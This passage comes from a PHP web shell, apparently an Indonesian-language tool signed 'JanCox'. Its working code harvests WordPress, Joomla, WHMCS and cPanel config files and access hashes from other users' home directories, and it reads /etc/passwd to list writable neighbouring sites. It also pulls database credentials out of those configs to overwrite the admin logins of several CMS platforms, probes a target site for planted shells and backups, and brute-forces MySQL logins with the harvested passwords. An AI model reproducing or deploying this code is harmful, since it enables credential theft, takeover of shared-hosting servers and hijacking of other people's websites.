  2757.                     "/home2/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2758.                     "/home2/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2759.                     "/home2/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2760.                     "/home2/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2761.                     "/home2/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2762.                     "/home2/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2763.                     "/home2/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2764.                     "/home2/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2765.                     "/home2/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2766.                     "/home2/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2767.                     "/home2/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2768.                     "/home2/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2769.                     "/home2/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2770.                     "/home2/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2771.                     "/home2/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2772.                     "/home2/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2773.                     "/home2/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2774.                     "/home2/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2775.                     "/home2/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  2776.                     "/home3/$user_cox/.my.cnf" => "cpanel",
  2777.                     "/home3/$user_cox/.accesshash" => "WHM-accesshash",
  2778.                     "/home3/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2779.                     "/home3/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2780.                     "/home3/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2781.                     "/home3/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",            
  2782.                     "/home3/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2783.                     "/home3/$user_cox/public_html/forum/config.php" => "phpBB",
  2784.                     "/home3/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2785.                     "/home3/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2786.                     "/home3/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2787.                     "/home3/$user_cox/public_html/admin/config.php" => "OpenCart",
  2788.                     "/home3/$user_cox/public_html/slconfig.php" => "Sitelok",
  2789.                     "/home3/$user_cox/public_html/application/config/database.php" => "Ellislab",                  
  2790.                     "/home3/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2791.                     "/home3/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2792.                     "/home3/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2793.                     "/home3/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2794.                     "/home3/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2795.                     "/home3/$user_cox/public_html/submitticket.php" => "WHMCS",                                    
  2796.                     "/home3/$user_cox/public_html/configuration.php" => "Joomla",                  
  2797.                     "/home3/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2798.                     "/home3/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2799.                     "/home3/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
  2800.                     "/home3/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2801.                     "/home3/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2802.                     "/home3/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2803.                     "/home3/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2804.                     "/home3/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2805.                     "/home3/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2806.                     "/home3/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2807.                     "/home3/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2808.                     "/home3/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2809.                     "/home3/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2810.                     "/home3/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2811.                     "/home3/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2812.                     "/home3/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2813.                     "/home3/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2814.                     "/home3/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2815.                     "/home3/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2816.                     "/home3/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2817.                     "/home3/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2818.                     "/home3/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2819.                     "/home3/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2820.                     "/home3/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2821.                     "/home3/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2822.                     "/home3/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2823.                     "/home3/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2824.                     "/home3/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2825.                     "/home3/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2826.                     "/home3/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2827.                     "/home3/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2828.                     "/home3/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2829.                     "/home3/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2830.                     "/home3/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2831.                     "/home3/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2832.                     "/home3/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",                 
  2833.                     "/home3/$user_cox/public_html/wp-config.php" => "WordPress",
  2834.                     "/home3/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2835.                     "/home3/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2836.                     "/home3/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
  2837.                     "/home3/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2838.                     "/home3/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2839.                     "/home3/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2840.                     "/home3/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2841.                     "/home3/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2842.                     "/home3/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2843.                     "/home3/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2844.                     "/home3/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2845.                     "/home3/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2846.                     "/home3/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2847.                     "/home3/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2848.                     "/home3/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2849.                     "/home3/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2850.                     "/home3/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2851.                     "/home3/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2852.                     "/home3/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2853.                     "/home3/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2854.                     "/home3/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2855.                     "/home3/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2856.                     "/home3/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2857.                     "/home3/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2858.                     "/home3/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2859.                     "/home3/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2860.                     "/home3/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2861.                     "/home3/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2862.                     "/home3/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2863.                     "/home3/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2864.                     "/home3/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2865.                     "/home3/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2866.                     "/home3/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2867.                     "/home3/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2868.                     "/home3/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2869.                     "/home3/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal"                   
  2870.                         ); 
  2871.                     foreach($grab_config as $config => $nama_config) {
  2872.                         $ambil_config = file_get_contents($config);
  2873.                         if($ambil_config == '') {
  2874.                         } else {
  2875.                             $file_config = fopen("cox_config/$user_cox-$nama_config.txt","w");
  2876.                             fputs($file_config,$ambil_config);
  2877.                         }
  2878.                     }
  2879.                 }      
  2880.             }
  2881.             echo "<center><a href='?dir=$dir/cox_config'><font color=lime>Done</font></a></center>";
  2882.             }else{
  2883.                
  2884.         echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  2885.         echo file_get_contents('/etc/passwd');
  2886.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  2887.         }
  2888. } elseif($_GET['do'] == 'jumping') {
  2889.     $i = 0;
  2890.     echo "<pre><div class='margin: 5px auto;'>";
  2891.     $etc = fopen("/etc/passwd", "r");
  2892.     while($passwd = fgets($etc)) {
  2893.         if($passwd == '' || !$etc) {
  2894.             echo "<font color=red>Can't read /etc/passwd</font>";
  2895.         } else {
  2896.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  2897.             foreach($user_jumping[1] as $user_idx_jump) {
  2898.                 $user_jumping_dir = "/home/$user_idx_jump/public_html";
  2899.                 if(is_readable($user_jumping_dir)) {
  2900.                     $i++;
  2901.                     $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  2902.                     if(is_writable($user_jumping_dir)) {
  2903.                         $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  2904.                     }
  2905.                     echo $jrw;
  2906.                     $domain_jump = file_get_contents("/etc/named.conf");   
  2907.                     if($domain_jump == '') {
  2908.                         echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2909.                     } else {
  2910.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2911.                         foreach($domains_jump[1] as $dj) {
  2912.                             $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2913.                             $user_jumping_url = $user_jumping_url['name'];
  2914.                             if($user_jumping_url == $user_idx_jump) {
  2915.                                 echo " => ( <u>$dj</u> )<br>";
  2916.                                 break;
  2917.                             }
  2918.                         }
  2919.                     }
  2920.                 }
  2921.             }
  2922.         }
  2923.     }
  2924.     if($i == 0) {
  2925.     } else {
  2926.         echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  2927.     }
  2928.     echo "</div></pre>";
  2929. } elseif($_GET['do'] == 'auto_edit_user') {
  2930.     if($_POST['hajar']) {
  2931.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2932.             echo "username atau password harus lebih dari 6 karakter";
  2933.         } else {
  2934.             $user_baru = $_POST['user_baru'];
  2935.             $pass_baru = md5($_POST['pass_baru']);
  2936.             $conf = $_POST['config_dir'];
  2937.             $scan_conf = scandir($conf);
  2938.             foreach($scan_conf as $file_conf) {
  2939.                 if(!is_file("$conf/$file_conf")) continue;
  2940.                 $config = file_get_contents("$conf/$file_conf");
  2941.                 if(preg_match("/JConfig|joomla/",$config)) {
  2942.                     $dbhost = ambilkata($config,"host = '","'");
  2943.                     $dbuser = ambilkata($config,"user = '","'");
  2944.                     $dbpass = ambilkata($config,"password = '","'");
  2945.                     $dbname = ambilkata($config,"db = '","'");
  2946.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  2947.                     $prefix = $dbprefix."users";
  2948.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2949.                     $db = mysql_select_db($dbname);
  2950.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2951.                     $result = mysql_fetch_array($q);
  2952.                     $id = $result['id'];
  2953.                     $site = ambilkata($config,"sitename = '","'");
  2954.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2955.                     echo "Config => ".$file_conf."<br>";
  2956.                     echo "CMS => Joomla<br>";
  2957.                     if($site == '') {
  2958.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2959.                     } else {
  2960.                         echo "Sitename => $site<br>";
  2961.                     }
  2962.                     if(!$update OR !$conn OR !$db) {
  2963.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2964.                     } else {
  2965.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2966.                     }
  2967.                     mysql_close($conn);
  2968.                 } elseif(preg_match("/WordPress/",$config)) {
  2969.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  2970.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  2971.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2972.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  2973.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2974.                     $prefix = $dbprefix."users";
  2975.                     $option = $dbprefix."options";
  2976.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2977.                     $db = mysql_select_db($dbname);
  2978.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2979.                     $result = mysql_fetch_array($q);
  2980.                     $id = $result[ID];
  2981.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2982.                     $result2 = mysql_fetch_array($q2);
  2983.                     $target = $result2[option_value];
  2984.                     if($target == '') {
  2985.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2986.                     } else {
  2987.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2988.                     }
  2989.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2990.                     echo "Config => ".$file_conf."<br>";
  2991.                     echo "CMS => Wordpress<br>";
  2992.                     echo $url_target;
  2993.                     if(!$update OR !$conn OR !$db) {
  2994.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2995.                     } else {
  2996.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2997.                     }
  2998.                     mysql_close($conn);
  2999.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3000.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3001.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3002.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3003.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3004.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3005.                     $prefix = $dbprefix."admin_user";
  3006.                     $option = $dbprefix."core_config_data";
  3007.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3008.                     $db = mysql_select_db($dbname);
  3009.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3010.                     $result = mysql_fetch_array($q);
  3011.                     $id = $result[user_id];
  3012.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3013.                     $result2 = mysql_fetch_array($q2);
  3014.                     $target = $result2[value];
  3015.                     if($target == '') {
  3016.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3017.                     } else {
  3018.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3019.                     }
  3020.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3021.                     echo "Config => ".$file_conf."<br>";
  3022.                     echo "CMS => Magento<br>";
  3023.                     echo $url_target;
  3024.                     if(!$update OR !$conn OR !$db) {
  3025.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3026.                     } else {
  3027.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3028.                     }
  3029.                     mysql_close($conn);
  3030.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3031.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3032.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3033.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3034.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3035.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3036.                     $prefix = $dbprefix."user";
  3037.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3038.                     $db = mysql_select_db($dbname);
  3039.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3040.                     $result = mysql_fetch_array($q);
  3041.                     $id = $result[user_id];
  3042.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  3043.                     if($target == '') {
  3044.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3045.                     } else {
  3046.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3047.                     }
  3048.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3049.                     echo "Config => ".$file_conf."<br>";
  3050.                     echo "CMS => OpenCart<br>";
  3051.                     echo $url_target;
  3052.                     if(!$update OR !$conn OR !$db) {
  3053.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3054.                     } else {
  3055.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3056.                     }
  3057.                     mysql_close($conn);
  3058.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3059.                     $dbhost = ambilkata($config,'server = "','"');
  3060.                     $dbuser = ambilkata($config,'username = "','"');
  3061.                     $dbpass = ambilkata($config,'password = "','"');
  3062.                     $dbname = ambilkata($config,'database = "','"');
  3063.                     $prefix = "users";
  3064.                     $option = "identitas";
  3065.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3066.                     $db = mysql_select_db($dbname);
  3067.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3068.                     $result = mysql_fetch_array($q);
  3069.                     $target = $result[alamat_website];
  3070.                     if($target == '') {
  3071.                         $target2 = $result[url];
  3072.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3073.                         if($target2 == '') {
  3074.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3075.                         } else {
  3076.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  3077.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  3078.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  3079.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  3080.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  3081.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  3082.                             } else {
  3083.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3084.                             }
  3085.                         }
  3086.                     } else {
  3087.                         $cek_login = file_get_contents("$target/adminweb/");
  3088.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  3089.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  3090.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  3091.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  3092.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  3093.                         } else {
  3094.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3095.                         }
  3096.                     }
  3097.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  3098.                     echo "Config => ".$file_conf."<br>";
  3099.                     echo "CMS => Lokomedia<br>";
  3100.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  3101.                         echo $url_target2;
  3102.                     } else {
  3103.                         echo $url_target;
  3104.                     }
  3105.                     if(!$update OR !$conn OR !$db) {
  3106.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3107.                     } else {
  3108.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3109.                     }
  3110.                     mysql_close($conn);
  3111.                 }
  3112.             }
  3113.         }
  3114.     } else {
  3115.         echo "<center>
  3116.         <h1>Auto Edit User Config</h1>
  3117.         <form method='post'>
  3118.         DIR Config: <br>
  3119.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3120.         Set User & Pass: <br>
  3121.         <input type='text' name='user_baru' value='0x1999' placeholder='user_baru'><br>
  3122.         <input type='text' name='pass_baru' value='0x1999' placeholder='pass_baru'><br>
  3123.         <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  3124.         </form>
  3125.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3126.         ";
  3127.     }
  3128. }elseif($_GET['do'] == 'shelscan') {
  3129.     echo'<center><h2>Shell Finder</h2>
  3130. <form action="" method="post">
  3131. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  3132. <br>
  3133. <input name="scan" value="Start Scaning"  style="width: 215px;" type="submit">
  3134. </form><br>';
  3135. if (isset($_POST["scan"])) {  
  3136. $url = $_POST['traget'];
  3137. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  3138. echo "Result :<br />";
  3139. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  3140. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  3141. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  3142. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  3143. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  3144. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  3145. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  3146. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  3147. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  3148. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  3149. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  3150. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  3151. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  3152. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  3153. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  3154. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  3155. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  3156. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  3157. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  3158. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  3159. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  3160. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  3161. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  3162. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  3163. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  3164. foreach ($shells as $shell){
  3165. $headers = get_headers("$url$shell"); //
  3166. if (eregi('200', $headers[0])) {
  3167. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  3168. $dz = fopen('shells.txt', 'a+');
  3169. $suck = "$url$shell";
  3170. fwrite($dz, $suck."\n");
  3171. }
  3172. }
  3173. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  3174. }
  3175.    
  3176. }
  3177.  elseif($_GET['do'] == 'cpanel') {
  3178.     if($_POST['crack']) {
  3179.         $usercp = explode("\r\n", $_POST['user_cp']);
  3180.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3181.         $i = 0;
  3182.         foreach($usercp as $ucp) {
  3183.             foreach($passcp as $pcp) {
  3184.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3185.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3186.                     } else {
  3187.                         $_SESSION[$ucp] = "1";
  3188.                         $_SESSION[$pcp] = "1";
  3189.                         $i++;
  3190.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3191.                     }
  3192.                 }
  3193.             }
  3194.         }
  3195.         if($i == 0) {
  3196.         } else {
  3197.             echo "<br>Nemu ".$i." Cpanel by <font color=lime>JanCox</font>";
  3198.         }
  3199.     } else {
  3200.         echo "<center>
  3201.         <form method='post'>
  3202.         USER: <br>
  3203.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3204.         $_usercp = fopen("/etc/passwd","r");
  3205.         while($getu = fgets($_usercp)) {
  3206.             if($getu == '' || !$_usercp) {
  3207.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3208.             } else {
  3209.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3210.                 foreach($u[1] as $user_cp) {
  3211.                         if(is_dir("/home/$user_cp/public_html")) {
  3212.                             echo "$user_cp\n";
  3213.                     }
  3214.                 }
  3215.             }
  3216.         }
  3217.         echo "</textarea><br>
  3218.         PASS: <br>
  3219.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3220.         function cp_pass($dir) {
  3221.             $pass = "";
  3222.             $dira = scandir($dir);
  3223.             foreach($dira as $dirb) {
  3224.                 if(!is_file("$dir/$dirb")) continue;
  3225.                 $ambil = file_get_contents("$dir/$dirb");
  3226.                 if(preg_match("/WordPress/", $ambil)) {
  3227.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3228.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3229.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
